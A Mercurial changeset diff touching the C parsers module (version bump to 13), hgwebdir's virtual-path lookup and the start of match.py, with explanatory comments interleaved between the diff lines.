561 561 right = PyBytes_FromStringAndSize(meta, rightsize);
562 562 meta += rightsize;
563 563 tmp = PyTuple_New(2);
564 564 if (!left || !right || !tmp) {
565 565 Py_XDECREF(left);
566 566 Py_XDECREF(right);
567 567 Py_XDECREF(tmp);
568 568 goto bail;
569 569 }
570 570 PyTuple_SET_ITEM(tmp, 0, left);
571 571 PyTuple_SET_ITEM(tmp, 1, right);
572 572 PyTuple_SET_ITEM(metadata, i, tmp);
573 573 }
574 574 ret = Py_BuildValue("(OOHO(di)O)", prec, succs, flags, metadata, mtime,
575 575 (int)tz * 60, parents);
576 576 goto bail; /* return successfully */
577 577
578 578 overflow:
579 579 PyErr_SetString(PyExc_ValueError, "overflow in obsstore");
580 580 bail:
581 581 Py_XDECREF(prec);
582 582 Py_XDECREF(succs);
583 583 Py_XDECREF(metadata);
584 584 Py_XDECREF(parents);
585 585 return ret;
586 586 }
587 587
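fm1readmarker() walks a fixed 19-byte header, which FM1_HEADER_SIZE (4 + 8 + 2 + 2 + 1 + 1 + 1) spells out field by field. The same header could be unpacked in one shot in Python (illustrative sketch):

    import struct

    # msize (uint32), mtime (float64), tz (int16), flags (uint16),
    # nsuccs, nparents, nmetadata (one byte each), all big-endian
    FM1_HEADER = struct.Struct('>IdhHBBB')
    assert FM1_HEADER.size == 19  # == FM1_HEADER_SIZE

    def readfm1header(data, offset=0):
        return FM1_HEADER.unpack_from(data, offset)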
588 588 static PyObject *fm1readmarkers(PyObject *self, PyObject *args)
589 589 {
590 590 const char *data, *dataend;
591 591 Py_ssize_t datalen, offset, stop;
592 592 PyObject *markers = NULL;
593 593
594 594 if (!PyArg_ParseTuple(args, PY23("s#nn", "y#nn"), &data, &datalen,
595 595 &offset, &stop)) {
596 596 return NULL;
597 597 }
598 598 if (offset < 0) {
599 599 PyErr_SetString(PyExc_ValueError,
600 600 "invalid negative offset in fm1readmarkers");
601 601 return NULL;
602 602 }
603 603 if (stop > datalen) {
604 604 PyErr_SetString(
605 605 PyExc_ValueError,
606 606 "stop longer than data length in fm1readmarkers");
607 607 return NULL;
608 608 }
609 609 dataend = data + datalen;
610 610 data += offset;
611 611 markers = PyList_New(0);
612 612 if (!markers) {
613 613 return NULL;
614 614 }
615 615 while (offset < stop) {
616 616 uint32_t msize;
617 617 int error;
618 618 PyObject *record = fm1readmarker(data, dataend, &msize);
619 619 if (!record) {
620 620 goto bail;
621 621 }
622 622 error = PyList_Append(markers, record);
623 623 Py_DECREF(record);
624 624 if (error) {
625 625 goto bail;
626 626 }
627 627 data += msize;
628 628 offset += msize;
629 629 }
630 630 return markers;
631 631 bail:
632 632 Py_DECREF(markers);
633 633 return NULL;
634 634 }
635 635
636 636 static char parsers_doc[] = "Efficient content parsing.";
637 637
638 638 PyObject *encodedir(PyObject *self, PyObject *args);
639 639 PyObject *pathencode(PyObject *self, PyObject *args);
640 640 PyObject *lowerencode(PyObject *self, PyObject *args);
641 641 PyObject *parse_index2(PyObject *self, PyObject *args);
642 642
643 643 static PyMethodDef methods[] = {
644 644 {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"},
645 645 {"nonnormalotherparententries", nonnormalotherparententries, METH_VARARGS,
646 646 "create a set containing non-normal and other parent entries of given "
647 647 "dirstate\n"},
648 648 {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"},
649 649 {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"},
650 650 {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"},
651 651 {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"},
652 652 {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"},
653 653 {"dict_new_presized", dict_new_presized, METH_VARARGS,
654 654 "construct a dict with an expected size\n"},
655 655 {"make_file_foldmap", make_file_foldmap, METH_VARARGS,
656 656 "make file foldmap\n"},
657 657 {"jsonescapeu8fast", jsonescapeu8fast, METH_VARARGS,
658 658 "escape a UTF-8 byte string to JSON (fast path)\n"},
659 659 {"encodedir", encodedir, METH_VARARGS, "encodedir a path\n"},
660 660 {"pathencode", pathencode, METH_VARARGS, "fncache-encode a path\n"},
661 661 {"lowerencode", lowerencode, METH_VARARGS, "lower-encode a path\n"},
662 662 {"fm1readmarkers", fm1readmarkers, METH_VARARGS,
663 663 "parse v1 obsolete markers\n"},
664 664 {NULL, NULL}};
665 665
666 666 void dirs_module_init(PyObject *mod);
667 667 void manifest_module_init(PyObject *mod);
668 668 void revlog_module_init(PyObject *mod);
669 669
670 static const int version = 12;
670 static const int version = 13;
671 671
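The version constant is bumped from 12 to 13 because this changeset changes observable behavior of the compiled module (dirs now include the root directory), so Python code written against the old semantics must not silently load the new binary, or vice versa. The consumer-side check is roughly this (a sketch; the real check lives in mercurial/policy.py):

    from mercurial.cext import parsers

    expected = 13  # what this version of the Python code was written against
    actual = getattr(parsers, 'version', None)
    if actual != expected:
        raise ImportError('cannot import mercurial.cext.parsers '
                          '(expected version: %d, actual: %r)'
                          % (expected, actual))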
672 672 static void module_init(PyObject *mod)
673 673 {
674 674 PyObject *capsule = NULL;
675 675 PyModule_AddIntConstant(mod, "version", version);
676 676
677 677 /* This module constant has two purposes. First, it lets us unit test
678 678 * the ImportError raised without hard-coding any error text. This
679 679 * means we can change the text in the future without breaking tests,
680 680 * even across changesets without a recompile. Second, its presence
681 681 * can be used to determine whether the version-checking logic is
682 682 * present, which also helps in testing across changesets without a
683 683 * recompile. Note that this means the pure-Python version of parsers
684 684 * should not have this module constant. */
685 685 PyModule_AddStringConstant(mod, "versionerrortext", versionerrortext);
686 686
687 687 dirs_module_init(mod);
688 688 manifest_module_init(mod);
689 689 revlog_module_init(mod);
690 690
691 691 capsule = PyCapsule_New(
692 692 make_dirstate_tuple,
693 693 "mercurial.cext.parsers.make_dirstate_tuple_CAPI", NULL);
694 694 if (capsule != NULL)
695 695 PyModule_AddObject(mod, "make_dirstate_tuple_CAPI", capsule);
696 696
697 697 if (PyType_Ready(&dirstateTupleType) < 0) {
698 698 return;
699 699 }
700 700 Py_INCREF(&dirstateTupleType);
701 701 PyModule_AddObject(mod, "dirstatetuple",
702 702 (PyObject *)&dirstateTupleType);
703 703 }
704 704
705 705 static int check_python_version(void)
706 706 {
707 707 PyObject *sys = PyImport_ImportModule("sys"), *ver;
708 708 long hexversion;
709 709 if (!sys) {
710 710 return -1;
711 711 }
712 712 ver = PyObject_GetAttrString(sys, "hexversion");
713 713 Py_DECREF(sys);
714 714 if (!ver) {
715 715 return -1;
716 716 }
717 717 hexversion = PyInt_AsLong(ver);
718 718 Py_DECREF(ver);
719 719 /* sys.hexversion is a 32-bit number by default, so the -1 case
720 720 * should only occur in unusual circumstances (e.g. if sys.hexversion
721 721 * is manually set to an invalid value). */
722 722 if ((hexversion == -1) || (hexversion >> 16 != PY_VERSION_HEX >> 16)) {
723 723 PyErr_Format(PyExc_ImportError,
724 724 "%s: The Mercurial extension "
725 725 "modules were compiled with Python " PY_VERSION
726 726 ", but "
727 727 "Mercurial is currently using Python with "
728 728 "sys.hexversion=%ld: "
729 729 "Python %s\n at: %s",
730 730 versionerrortext, hexversion, Py_GetVersion(),
731 731 Py_GetProgramFullPath());
732 732 return -1;
733 733 }
734 734 return 0;
735 735 }
736 736
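check_python_version() compares only the upper 16 bits of sys.hexversion, i.e. the major and minor version, so a micro-release upgrade does not invalidate the compiled extensions. An illustrative Python-side equivalent (PY_VERSION_HEX_AT_BUILD is a hypothetical stand-in for the value baked in at compile time):

    import sys

    PY_VERSION_HEX_AT_BUILD = 0x03070400  # e.g. built against Python 3.7.4

    if sys.hexversion >> 16 != PY_VERSION_HEX_AT_BUILD >> 16:
        # major or minor version differs: refuse to load the extensions
        raise ImportError('Python minor version mismatch')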
737 737 #ifdef IS_PY3K
738 738 static struct PyModuleDef parsers_module = {PyModuleDef_HEAD_INIT, "parsers",
739 739 parsers_doc, -1, methods};
740 740
741 741 PyMODINIT_FUNC PyInit_parsers(void)
742 742 {
743 743 PyObject *mod;
744 744
745 745 if (check_python_version() == -1)
746 746 return NULL;
747 747 mod = PyModule_Create(&parsers_module);
748 748 module_init(mod);
749 749 return mod;
750 750 }
751 751 #else
752 752 PyMODINIT_FUNC initparsers(void)
753 753 {
754 754 PyObject *mod;
755 755
756 756 if (check_python_version() == -1) {
757 757 return;
758 758 }
759 759 mod = Py_InitModule3("parsers", methods, parsers_doc);
760 760 module_init(mod);
761 761 }
762 762 #endif
@@ -1,540 +1,536 @@ hgweb/hgwebdir_mod.py
1 1 # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories.
2 2 #
3 3 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
4 4 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import
10 10
11 11 import gc
12 12 import os
13 13 import time
14 14
15 15 from ..i18n import _
16 16
17 17 from .common import (
18 18 ErrorResponse,
19 19 HTTP_SERVER_ERROR,
20 20 cspvalues,
21 21 get_contact,
22 22 get_mtime,
23 23 ismember,
24 24 paritygen,
25 25 staticfile,
26 26 statusmessage,
27 27 )
28 28
29 29 from .. import (
30 30 configitems,
31 31 encoding,
32 32 error,
33 33 extensions,
34 34 hg,
35 35 profiling,
36 36 pycompat,
37 37 registrar,
38 38 scmutil,
39 39 templater,
40 40 templateutil,
41 41 ui as uimod,
42 42 util,
43 43 )
44 44
45 45 from . import (
46 46 hgweb_mod,
47 47 request as requestmod,
48 48 webutil,
49 49 wsgicgi,
50 50 )
51 51 from ..utils import dateutil
52 52
53 53 def cleannames(items):
54 54 return [(util.pconvert(name).strip('/'), path) for name, path in items]
55 55
56 56 def findrepos(paths):
57 57 repos = []
58 58 for prefix, root in cleannames(paths):
59 59 roothead, roottail = os.path.split(root)
60 60 # "foo = /bar/*" or "foo = /bar/**" lets every repo /bar/N in or below
61 61 # /bar/ be served as foo/N.
62 62 # '*' will not search inside dirs with .hg (except .hg/patches),
63 63 # '**' will search inside dirs with .hg (and thus also find subrepos).
64 64 try:
65 65 recurse = {'*': False, '**': True}[roottail]
66 66 except KeyError:
67 67 repos.append((prefix, root))
68 68 continue
69 69 roothead = os.path.normpath(os.path.abspath(roothead))
70 70 paths = scmutil.walkrepos(roothead, followsym=True, recurse=recurse)
71 71 repos.extend(urlrepos(prefix, roothead, paths))
72 72 return repos
73 73
74 74 def urlrepos(prefix, roothead, paths):
75 75 """yield url paths and filesystem paths from a list of repo paths
76 76
77 77 >>> conv = lambda seq: [(v, util.pconvert(p)) for v,p in seq]
78 78 >>> conv(urlrepos(b'hg', b'/opt', [b'/opt/r', b'/opt/r/r', b'/opt']))
79 79 [('hg/r', '/opt/r'), ('hg/r/r', '/opt/r/r'), ('hg', '/opt')]
80 80 >>> conv(urlrepos(b'', b'/opt', [b'/opt/r', b'/opt/r/r', b'/opt']))
81 81 [('r', '/opt/r'), ('r/r', '/opt/r/r'), ('', '/opt')]
82 82 """
83 83 for path in paths:
84 84 path = os.path.normpath(path)
85 85 yield (prefix + '/' +
86 86 util.pconvert(path[len(roothead):]).lstrip('/')).strip('/'), path
87 87
88 88 def readallowed(ui, req):
89 89 """Check allow_read and deny_read config options of a repo's ui object
90 90 to determine user permissions. By default, with neither option set (or
91 91 both empty), allow all users to read the repo. There are two ways a
92 92 user can be denied read access: (1) deny_read is not empty, and the
93 93 user is unauthenticated or deny_read contains user (or *), and (2)
94 94 allow_read is not empty and the user is not in allow_read. Return True
95 95 if user is allowed to read the repo, else return False."""
96 96
97 97 user = req.remoteuser
98 98
99 99 deny_read = ui.configlist('web', 'deny_read', untrusted=True)
100 100 if deny_read and (not user or ismember(ui, user, deny_read)):
101 101 return False
102 102
103 103 allow_read = ui.configlist('web', 'allow_read', untrusted=True)
104 104 # by default, allow reading if no allow_read option has been set
105 105 if not allow_read or ismember(ui, user, allow_read):
106 106 return True
107 107
108 108 return False
109 109
110 110 def rawindexentries(ui, repos, req, subdir=''):
111 111 descend = ui.configbool('web', 'descend')
112 112 collapse = ui.configbool('web', 'collapse')
113 113 seenrepos = set()
114 114 seendirs = set()
115 115 for name, path in repos:
116 116
117 117 if not name.startswith(subdir):
118 118 continue
119 119 name = name[len(subdir):]
120 120 directory = False
121 121
122 122 if '/' in name:
123 123 if not descend:
124 124 continue
125 125
126 126 nameparts = name.split('/')
127 127 rootname = nameparts[0]
128 128
129 129 if not collapse:
130 130 pass
131 131 elif rootname in seendirs:
132 132 continue
133 133 elif rootname in seenrepos:
134 134 pass
135 135 else:
136 136 directory = True
137 137 name = rootname
138 138
139 139 # redefine the path to refer to the directory
140 140 discarded = '/'.join(nameparts[1:])
141 141
142 142 # remove name parts plus accompanying slash
143 143 path = path[:-len(discarded) - 1]
144 144
145 145 try:
146 146 hg.repository(ui, path)
147 147 directory = False
148 148 except (IOError, error.RepoError):
149 149 pass
150 150
151 151 parts = [
152 152 req.apppath.strip('/'),
153 153 subdir.strip('/'),
154 154 name.strip('/'),
155 155 ]
156 156 url = '/' + '/'.join(p for p in parts if p) + '/'
157 157
158 158 # show either a directory entry or a repository
159 159 if directory:
160 160 # get the directory's time information
161 161 try:
162 162 d = (get_mtime(path), dateutil.makedate()[1])
163 163 except OSError:
164 164 continue
165 165
166 166 # add '/' to the name to make it obvious that
167 167 # the entry is a directory, not a regular repository
168 168 row = {'contact': "",
169 169 'contact_sort': "",
170 170 'name': name + '/',
171 171 'name_sort': name,
172 172 'url': url,
173 173 'description': "",
174 174 'description_sort': "",
175 175 'lastchange': d,
176 176 'lastchange_sort': d[1] - d[0],
177 177 'archives': templateutil.mappinglist([]),
178 178 'isdirectory': True,
179 179 'labels': templateutil.hybridlist([], name='label'),
180 180 }
181 181
182 182 seendirs.add(name)
183 183 yield row
184 184 continue
185 185
186 186 u = ui.copy()
187 187 try:
188 188 u.readconfig(os.path.join(path, '.hg', 'hgrc'))
189 189 except Exception as e:
190 190 u.warn(_('error reading %s/.hg/hgrc: %s\n') % (path, e))
191 191 continue
192 192
193 193 def get(section, name, default=uimod._unset):
194 194 return u.config(section, name, default, untrusted=True)
195 195
196 196 if u.configbool("web", "hidden", untrusted=True):
197 197 continue
198 198
199 199 if not readallowed(u, req):
200 200 continue
201 201
202 202 # update time with local timezone
203 203 try:
204 204 r = hg.repository(ui, path)
205 205 except IOError:
206 206 u.warn(_('error accessing repository at %s\n') % path)
207 207 continue
208 208 except error.RepoError:
209 209 u.warn(_('error accessing repository at %s\n') % path)
210 210 continue
211 211 try:
212 212 d = (get_mtime(r.spath), dateutil.makedate()[1])
213 213 except OSError:
214 214 continue
215 215
216 216 contact = get_contact(get)
217 217 description = get("web", "description")
218 218 seenrepos.add(name)
219 219 name = get("web", "name", name)
220 220 labels = u.configlist('web', 'labels', untrusted=True)
221 221 row = {'contact': contact or "unknown",
222 222 'contact_sort': contact.upper() or "unknown",
223 223 'name': name,
224 224 'name_sort': name,
225 225 'url': url,
226 226 'description': description or "unknown",
227 227 'description_sort': description.upper() or "unknown",
228 228 'lastchange': d,
229 229 'lastchange_sort': d[1] - d[0],
230 230 'archives': webutil.archivelist(u, "tip", url),
231 231 'isdirectory': None,
232 232 'labels': templateutil.hybridlist(labels, name='label'),
233 233 }
234 234
235 235 yield row
236 236
237 237 def _indexentriesgen(context, ui, repos, req, stripecount, sortcolumn,
238 238 descending, subdir):
239 239 rows = rawindexentries(ui, repos, req, subdir=subdir)
240 240
241 241 sortdefault = None, False
242 242
243 243 if sortcolumn and sortdefault != (sortcolumn, descending):
244 244 sortkey = '%s_sort' % sortcolumn
245 245 rows = sorted(rows, key=lambda x: x[sortkey],
246 246 reverse=descending)
247 247
248 248 for row, parity in zip(rows, paritygen(stripecount)):
249 249 row['parity'] = parity
250 250 yield row
251 251
252 252 def indexentries(ui, repos, req, stripecount, sortcolumn='',
253 253 descending=False, subdir=''):
254 254 args = (ui, repos, req, stripecount, sortcolumn, descending, subdir)
255 255 return templateutil.mappinggenerator(_indexentriesgen, args=args)
256 256
257 257 class hgwebdir(object):
258 258 """HTTP server for multiple repositories.
259 259
260 260 Given a configuration, different repositories will be served depending
261 261 on the request path.
262 262
263 263 Instances are typically used as WSGI applications.
264 264 """
265 265 def __init__(self, conf, baseui=None):
266 266 self.conf = conf
267 267 self.baseui = baseui
268 268 self.ui = None
269 269 self.lastrefresh = 0
270 270 self.motd = None
271 271 self.refresh()
272 272 if not baseui:
273 273 # set up environment for new ui
274 274 extensions.loadall(self.ui)
275 275 extensions.populateui(self.ui)
276 276
277 277 def refresh(self):
278 278 if self.ui:
279 279 refreshinterval = self.ui.configint('web', 'refreshinterval')
280 280 else:
281 281 item = configitems.coreitems['web']['refreshinterval']
282 282 refreshinterval = item.default
283 283
284 284 # refreshinterval <= 0 means to always refresh.
285 285 if (refreshinterval > 0 and
286 286 self.lastrefresh + refreshinterval > time.time()):
287 287 return
288 288
289 289 if self.baseui:
290 290 u = self.baseui.copy()
291 291 else:
292 292 u = uimod.ui.load()
293 293 u.setconfig('ui', 'report_untrusted', 'off', 'hgwebdir')
294 294 u.setconfig('ui', 'nontty', 'true', 'hgwebdir')
295 295 # displaying bundling progress bar while serving feels wrong and may
296 296 # break some wsgi implementations.
297 297 u.setconfig('progress', 'disable', 'true', 'hgweb')
298 298
299 299 if not isinstance(self.conf, (dict, list, tuple)):
300 300 map = {'paths': 'hgweb-paths'}
301 301 if not os.path.exists(self.conf):
302 302 raise error.Abort(_('config file %s not found!') % self.conf)
303 303 u.readconfig(self.conf, remap=map, trust=True)
304 304 paths = []
305 305 for name, ignored in u.configitems('hgweb-paths'):
306 306 for path in u.configlist('hgweb-paths', name):
307 307 paths.append((name, path))
308 308 elif isinstance(self.conf, (list, tuple)):
309 309 paths = self.conf
310 310 elif isinstance(self.conf, dict):
311 311 paths = self.conf.items()
312 312 extensions.populateui(u)
313 313
314 314 repos = findrepos(paths)
315 315 for prefix, root in u.configitems('collections'):
316 316 prefix = util.pconvert(prefix)
317 317 for path in scmutil.walkrepos(root, followsym=True):
318 318 repo = os.path.normpath(path)
319 319 name = util.pconvert(repo)
320 320 if name.startswith(prefix):
321 321 name = name[len(prefix):]
322 322 repos.append((name.lstrip('/'), repo))
323 323
324 324 self.repos = repos
325 325 self.ui = u
326 326 encoding.encoding = self.ui.config('web', 'encoding')
327 327 self.style = self.ui.config('web', 'style')
328 328 self.templatepath = self.ui.config('web', 'templates', untrusted=False)
329 329 self.stripecount = self.ui.config('web', 'stripes')
330 330 if self.stripecount:
331 331 self.stripecount = int(self.stripecount)
332 332 prefix = self.ui.config('web', 'prefix')
333 333 if prefix.startswith('/'):
334 334 prefix = prefix[1:]
335 335 if prefix.endswith('/'):
336 336 prefix = prefix[:-1]
337 337 self.prefix = prefix
338 338 self.lastrefresh = time.time()
339 339
340 340 def run(self):
341 341 if not encoding.environ.get('GATEWAY_INTERFACE',
342 342 '').startswith("CGI/1."):
343 343 raise RuntimeError("This function is only intended to be "
344 344 "called while running as a CGI script.")
345 345 wsgicgi.launch(self)
346 346
347 347 def __call__(self, env, respond):
348 348 baseurl = self.ui.config('web', 'baseurl')
349 349 req = requestmod.parserequestfromenv(env, altbaseurl=baseurl)
350 350 res = requestmod.wsgiresponse(req, respond)
351 351
352 352 return self.run_wsgi(req, res)
353 353
354 354 def run_wsgi(self, req, res):
355 355 profile = self.ui.configbool('profiling', 'enabled')
356 356 with profiling.profile(self.ui, enabled=profile):
357 357 try:
358 358 for r in self._runwsgi(req, res):
359 359 yield r
360 360 finally:
361 361 # There are known cycles in localrepository that prevent
362 362 # those objects (and tons of held references) from being
363 363 # collected through normal refcounting. We mitigate those
364 364 # leaks by performing an explicit GC on every request.
365 365 # TODO remove this once leaks are fixed.
366 366 # TODO only run this on requests that create localrepository
367 367 # instances instead of every request.
368 368 gc.collect()
369 369
370 370 def _runwsgi(self, req, res):
371 371 try:
372 372 self.refresh()
373 373
374 374 csp, nonce = cspvalues(self.ui)
375 375 if csp:
376 376 res.headers['Content-Security-Policy'] = csp
377 377
378 378 virtual = req.dispatchpath.strip('/')
379 379 tmpl = self.templater(req, nonce)
380 380 ctype = tmpl.render('mimetype', {'encoding': encoding.encoding})
381 381
382 382 # Global defaults. These can be overridden by any handler.
383 383 res.status = '200 Script output follows'
384 384 res.headers['Content-Type'] = ctype
385 385
386 386 # a static file
387 387 if virtual.startswith('static/') or 'static' in req.qsparams:
388 388 if virtual.startswith('static/'):
389 389 fname = virtual[7:]
390 390 else:
391 391 fname = req.qsparams['static']
392 392 static = self.ui.config("web", "static", untrusted=False)
393 393 if not static:
394 394 tp = self.templatepath or templater.templatepaths()
395 395 if isinstance(tp, str):
396 396 tp = [tp]
397 397 static = [os.path.join(p, 'static') for p in tp]
398 398
399 399 staticfile(static, fname, res)
400 400 return res.sendresponse()
401 401
402 402 # top-level index
403 403
404 404 repos = dict(self.repos)
405 405
406 406 if (not virtual or virtual == 'index') and virtual not in repos:
407 407 return self.makeindex(req, res, tmpl)
408 408
409 409 # nested indexes and hgwebs
410 410
411 411 if virtual.endswith('/index') and virtual not in repos:
412 412 subdir = virtual[:-len('index')]
413 413 if any(r.startswith(subdir) for r in repos):
414 414 return self.makeindex(req, res, tmpl, subdir)
415 415
416 416 def _virtualdirs():
417 # Check the full virtual path, each parent, and the root ('')
418 if virtual != '':
419 yield virtual
420
421 for p in util.finddirs(virtual):
422 yield p
423
424 yield ''
417 # Check the full virtual path, and each parent
418 yield virtual
419 for p in util.finddirs(virtual):
420 yield p
425 421
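With the new finddirs() contract, the explicit root handling can go away: finddirs() itself now ends with the empty string. For a non-empty path the traversal is unchanged (illustrative, not a doctest in the source):

    >>> virtual = b'foo/bar/repo'
    >>> [virtual] + list(util.finddirs(virtual))
    [b'foo/bar/repo', b'foo/bar', b'foo', b'']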
426 422 for virtualrepo in _virtualdirs():
427 423 real = repos.get(virtualrepo)
428 424 if real:
429 425 # Re-parse the WSGI environment to take into account our
430 426 # repository path component.
431 427 uenv = req.rawenv
432 428 if pycompat.ispy3:
433 429 uenv = {k.decode('latin1'): v for k, v in
434 430 uenv.iteritems()}
435 431 req = requestmod.parserequestfromenv(
436 432 uenv, reponame=virtualrepo,
437 433 altbaseurl=self.ui.config('web', 'baseurl'),
438 434 # Reuse wrapped body file object otherwise state
439 435 # tracking can get confused.
440 436 bodyfh=req.bodyfh)
441 437 try:
442 438 # ensure caller gets private copy of ui
443 439 repo = hg.repository(self.ui.copy(), real)
444 440 return hgweb_mod.hgweb(repo).run_wsgi(req, res)
445 441 except IOError as inst:
446 442 msg = encoding.strtolocal(inst.strerror)
447 443 raise ErrorResponse(HTTP_SERVER_ERROR, msg)
448 444 except error.RepoError as inst:
449 445 raise ErrorResponse(HTTP_SERVER_ERROR, bytes(inst))
450 446
451 447 # browse subdirectories
452 448 subdir = virtual + '/'
453 449 if [r for r in repos if r.startswith(subdir)]:
454 450 return self.makeindex(req, res, tmpl, subdir)
455 451
456 452 # prefixes not found
457 453 res.status = '404 Not Found'
458 454 res.setbodygen(tmpl.generate('notfound', {'repo': virtual}))
459 455 return res.sendresponse()
460 456
461 457 except ErrorResponse as e:
462 458 res.status = statusmessage(e.code, pycompat.bytestr(e))
463 459 res.setbodygen(tmpl.generate('error', {'error': e.message or ''}))
464 460 return res.sendresponse()
465 461 finally:
466 462 tmpl = None
467 463
468 464 def makeindex(self, req, res, tmpl, subdir=""):
469 465 self.refresh()
470 466 sortable = ["name", "description", "contact", "lastchange"]
471 467 sortcolumn, descending = None, False
472 468 if 'sort' in req.qsparams:
473 469 sortcolumn = req.qsparams['sort']
474 470 descending = sortcolumn.startswith('-')
475 471 if descending:
476 472 sortcolumn = sortcolumn[1:]
477 473 if sortcolumn not in sortable:
478 474 sortcolumn = ""
479 475
480 476 sort = [("sort_%s" % column,
481 477 "%s%s" % ((not descending and column == sortcolumn)
482 478 and "-" or "", column))
483 479 for column in sortable]
484 480
485 481 self.refresh()
486 482
487 483 entries = indexentries(self.ui, self.repos, req,
488 484 self.stripecount, sortcolumn=sortcolumn,
489 485 descending=descending, subdir=subdir)
490 486
491 487 mapping = {
492 488 'entries': entries,
493 489 'subdir': subdir,
494 490 'pathdef': hgweb_mod.makebreadcrumb('/' + subdir, self.prefix),
495 491 'sortcolumn': sortcolumn,
496 492 'descending': descending,
497 493 }
498 494 mapping.update(sort)
499 495 res.setbodygen(tmpl.generate('index', mapping))
500 496 return res.sendresponse()
501 497
502 498 def templater(self, req, nonce):
503 499
504 500 def config(section, name, default=uimod._unset, untrusted=True):
505 501 return self.ui.config(section, name, default, untrusted)
506 502
507 503 vars = {}
508 504 styles, (style, mapfile) = hgweb_mod.getstyle(req, config,
509 505 self.templatepath)
510 506 if style == styles[0]:
511 507 vars['style'] = style
512 508
513 509 sessionvars = webutil.sessionvars(vars, '?')
514 510 logourl = config('web', 'logourl')
515 511 logoimg = config('web', 'logoimg')
516 512 staticurl = (config('web', 'staticurl')
517 513 or req.apppath.rstrip('/') + '/static/')
518 514 if not staticurl.endswith('/'):
519 515 staticurl += '/'
520 516
521 517 defaults = {
522 518 "encoding": encoding.encoding,
523 519 "url": req.apppath + '/',
524 520 "logourl": logourl,
525 521 "logoimg": logoimg,
526 522 "staticurl": staticurl,
527 523 "sessionvars": sessionvars,
528 524 "style": style,
529 525 "nonce": nonce,
530 526 }
531 527 templatekeyword = registrar.templatekeyword(defaults)
532 528 @templatekeyword('motd', requires=())
533 529 def motd(context, mapping):
534 530 if self.motd is not None:
535 531 yield self.motd
536 532 else:
537 533 yield config('web', 'motd')
538 534
539 535 tmpl = templater.templater.frommapfile(mapfile, defaults=defaults)
540 536 return tmpl
@@ -1,1530 +1,1526 @@ match.py
1 1 # match.py - filename matching
2 2 #
3 3 # Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import, print_function
9 9
10 10 import copy
11 11 import itertools
12 12 import os
13 13 import re
14 14
15 15 from .i18n import _
16 16 from . import (
17 17 encoding,
18 18 error,
19 19 pathutil,
20 20 pycompat,
21 21 util,
22 22 )
23 23 from .utils import (
24 24 stringutil,
25 25 )
26 26
27 27 try:
28 28 from . import rustext
29 29 rustext.__name__ # force actual import (see hgdemandimport)
30 30 except ImportError:
31 31 rustext = None
32 32
33 33 allpatternkinds = ('re', 'glob', 'path', 'relglob', 'relpath', 'relre',
34 34 'rootglob',
35 35 'listfile', 'listfile0', 'set', 'include', 'subinclude',
36 36 'rootfilesin')
37 37 cwdrelativepatternkinds = ('relpath', 'glob')
38 38
39 39 propertycache = util.propertycache
40 40
41 41 def _rematcher(regex):
42 42 '''compile the regexp with the best available regexp engine and return a
43 43 matcher function'''
44 44 m = util.re.compile(regex)
45 45 try:
46 46 # slightly faster, provided by facebook's re2 bindings
47 47 return m.test_match
48 48 except AttributeError:
49 49 return m.match
50 50
51 51 def _expandsets(kindpats, ctx=None, listsubrepos=False, badfn=None):
52 52 '''Returns the kindpats list with the 'set' patterns expanded to matchers'''
53 53 matchers = []
54 54 other = []
55 55
56 56 for kind, pat, source in kindpats:
57 57 if kind == 'set':
58 58 if ctx is None:
59 59 raise error.ProgrammingError("fileset expression with no "
60 60 "context")
61 61 matchers.append(ctx.matchfileset(pat, badfn=badfn))
62 62
63 63 if listsubrepos:
64 64 for subpath in ctx.substate:
65 65 sm = ctx.sub(subpath).matchfileset(pat, badfn=badfn)
66 66 pm = prefixdirmatcher(subpath, sm, badfn=badfn)
67 67 matchers.append(pm)
68 68
69 69 continue
70 70 other.append((kind, pat, source))
71 71 return matchers, other
72 72
73 73 def _expandsubinclude(kindpats, root):
74 74 '''Returns the list of subinclude matcher args and the kindpats without the
75 75 subincludes in it.'''
76 76 relmatchers = []
77 77 other = []
78 78
79 79 for kind, pat, source in kindpats:
80 80 if kind == 'subinclude':
81 81 sourceroot = pathutil.dirname(util.normpath(source))
82 82 pat = util.pconvert(pat)
83 83 path = pathutil.join(sourceroot, pat)
84 84
85 85 newroot = pathutil.dirname(path)
86 86 matcherargs = (newroot, '', [], ['include:%s' % path])
87 87
88 88 prefix = pathutil.canonpath(root, root, newroot)
89 89 if prefix:
90 90 prefix += '/'
91 91 relmatchers.append((prefix, matcherargs))
92 92 else:
93 93 other.append((kind, pat, source))
94 94
95 95 return relmatchers, other
96 96
97 97 def _kindpatsalwaysmatch(kindpats):
98 98 """"Checks whether the kindspats match everything, as e.g.
99 99 'relpath:.' does.
100 100 """
101 101 for kind, pat, source in kindpats:
102 102 if pat != '' or kind not in ['relpath', 'glob']:
103 103 return False
104 104 return True
105 105
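A doctest-style illustration of that rule (these examples are not in the source):

    >>> _kindpatsalwaysmatch([(b'relpath', b'', None)])
    True
    >>> _kindpatsalwaysmatch([(b'glob', b'', None)])
    True
    >>> _kindpatsalwaysmatch([(b'glob', b'*.c', None)])
    False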
106 106 def _buildkindpatsmatcher(matchercls, root, kindpats, ctx=None,
107 107 listsubrepos=False, badfn=None):
108 108 matchers = []
109 109 fms, kindpats = _expandsets(kindpats, ctx=ctx,
110 110 listsubrepos=listsubrepos, badfn=badfn)
111 111 if kindpats:
112 112 m = matchercls(root, kindpats, badfn=badfn)
113 113 matchers.append(m)
114 114 if fms:
115 115 matchers.extend(fms)
116 116 if not matchers:
117 117 return nevermatcher(badfn=badfn)
118 118 if len(matchers) == 1:
119 119 return matchers[0]
120 120 return unionmatcher(matchers)
121 121
122 122 def match(root, cwd, patterns=None, include=None, exclude=None, default='glob',
123 123 auditor=None, ctx=None, listsubrepos=False, warn=None,
124 124 badfn=None, icasefs=False):
